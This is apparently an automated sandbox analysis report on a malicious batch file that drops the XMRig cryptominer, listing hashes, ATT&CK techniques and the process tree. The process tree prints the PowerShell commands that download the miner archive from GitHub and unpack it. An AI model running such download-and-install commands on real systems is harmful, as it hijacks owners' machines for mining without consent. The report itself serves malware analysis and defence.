Analysis

  • max time kernel
    122s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    22-05-2024 02:54

General

  • Target

    1.bat

  • Size

    599B

  • MD5

    798b979417aa88e5323ead9be2d8425c

  • SHA1

    a54c5133c71afddf697f302b36bdb930c72852ce

  • SHA256

    f83d724987f9f4a0843c0b0abd01f3f5ceccbc8e7babad76c2639e1bef2fee07

  • SHA512

    a4f2ff598bc26b5ee7778b34b34aafd20e43f714c5f841b9fe73cdc6e1c3e47e44ffb94ff06ccd7dd263116201ff6754c956c1ea8f588acf6927f35446b5036b

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-msvc-win64.zip

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\1.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1888
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-msvc-win64.zip', 'xmrig-6.21.3-msvc-win64.zip')"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2096
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "Expand-Archive -Path 'xmrig-6.21.3-msvc-win64.zip' -DestinationPath '.'"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2700

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JO2TXQQX1CLJNQOKLKVP.temp
    Filesize

    7KB

    MD5

    bc5f9759ea58de005ad88653992b66de

    SHA1

    7ec999b65c24aeb27915f550521f3691a443c5e1

    SHA256

    b8da6a45346a47fd9f7af0d9adcc6ec0ff5d0542dae3f5fbb8c2a10bd03d8931

    SHA512

    c198e9b5a8c1334fa2693de2a891505cda407ea466dab272e5fafbd3af65de97089ac1109b732d69414d51de2247ba586a603496ee46fc0e56972e5e6c4f9598

  • memory/2096-4-0x000007FEF59DE000-0x000007FEF59DF000-memory.dmp
    Filesize

    4KB

  • memory/2096-7-0x000007FEF5720000-0x000007FEF60BD000-memory.dmp
    Filesize

    9.6MB

  • memory/2096-6-0x00000000027E0000-0x00000000027E8000-memory.dmp
    Filesize

    32KB

  • memory/2096-5-0x000000001B670000-0x000000001B952000-memory.dmp
    Filesize

    2.9MB

  • memory/2096-8-0x000007FEF5720000-0x000007FEF60BD000-memory.dmp
    Filesize

    9.6MB

  • memory/2096-11-0x000007FEF5720000-0x000007FEF60BD000-memory.dmp
    Filesize

    9.6MB

  • memory/2096-10-0x000007FEF5720000-0x000007FEF60BD000-memory.dmp
    Filesize

    9.6MB

  • memory/2096-9-0x000007FEF5720000-0x000007FEF60BD000-memory.dmp
    Filesize

    9.6MB

  • memory/2096-12-0x000007FEF5720000-0x000007FEF60BD000-memory.dmp
    Filesize

    9.6MB

  • memory/2700-19-0x0000000002070000-0x0000000002078000-memory.dmp
    Filesize

    32KB

  • memory/2700-18-0x000000001B590000-0x000000001B872000-memory.dmp
    Filesize

    2.9MB